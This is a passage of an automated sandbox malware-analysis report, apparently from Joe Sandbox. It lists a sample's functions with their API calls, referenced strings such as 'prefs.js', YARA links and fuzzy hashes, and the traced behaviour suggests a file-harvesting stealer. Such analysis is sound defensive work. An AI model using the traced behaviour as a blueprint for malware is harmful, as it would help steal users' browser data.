                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                  • String ID: 4@$\*.*
                                                                                  • API String ID: 2325840235-1993203227
                                                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                                                  Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID: prefs.js
                                                                                  • API String ID: 3334442632-3783873740
                                                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                                                  Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1415058207-1173974218
                                                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                                                  Function 00B0EF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B0EFA5
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B0EFBC
                                                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 00B0F012
                                                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B0F028
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0F515
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0F52A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 180737720-0
                                                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                  • Instruction ID: 789b6f58862a7a35b9a9ee586bfcf15def032d39bfb309ff755d9bd75fc3ecd2
                                                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                  • Instruction Fuzzy Hash: 7AE1F4719122189ADB58FB60DD92EEE77B9AF54700F8041D9B50A62092EF307FC9CF52
                                                                                  Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                                                  Function 00B0DCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B0DD52
                                                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B0DD9A
                                                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B0DDB0
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E033
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0E045
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                  • Instruction ID: ac4f1198c4718f0efb0ef3ec8f52256198cf2f684def751de5740eac26a13441
                                                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                  • Instruction Fuzzy Hash: 47915A729101049BCB14FBB4DE56DED7BBDAF95300F4086DCB44A96181FE34AB58CB92
                                                                                  Function 00B0F917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B0F985
                                                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B0F9D6
                                                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B0F9EC
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FD18
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0FD2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                  • Instruction ID: 24e3c5e909d6c21ce66ecce2290cd882e8ffa157a861f60950e16346d437be4c
                                                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                  • Instruction Fuzzy Hash: F5B14671A112189BCB24FF64DD96FFE77B9AF54300F4041E9A40A56591EF306B88CF92
                                                                                  Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                  • String ID: \*.*$@
                                                                                  • API String ID: 433455689-2355794846
                                                                                  • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                                                  • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                                                  Function 00B01937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B01B8A
                                                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B01BDA
                                                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00B01BF0
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B01FA7
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B02031
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B02087
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B02099
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1415058207-0
                                                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                  • Instruction ID: f3f8f21c6a13d9fbcc2f1d75b9a1e2b212aa220394ad1d30336b6512133638c1
                                                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                  • Instruction Fuzzy Hash: D312DA719112189BCB19EB60DD96EEEB7B9AF54700F8045D9B10A62091EF707FC8CF92
                                                                                  Function 00B0E077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B0E0C5
                                                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B0E115
                                                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B0E12B
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E647
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0E659
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2325840235-0
                                                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                  • Instruction ID: c43e3a507dfff06c59afea8bd812a8bac93871088d17f384b4e2afb88f7b4dd3
                                                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                  • Instruction Fuzzy Hash: EBF1BC719252189ACB19FB60DD95EEEB7B9AF14700F8051DAB05E62091EF307FC8CE52
                                                                                  Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                  • String ID: /
                                                                                  • API String ID: 3090951853-4001269591
                                                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                                                  Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C853
                                                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00906020), ref: 0040C871
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1498829745-0
                                                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                                                  Function 00B0CA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B0CABA
                                                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0CAD8
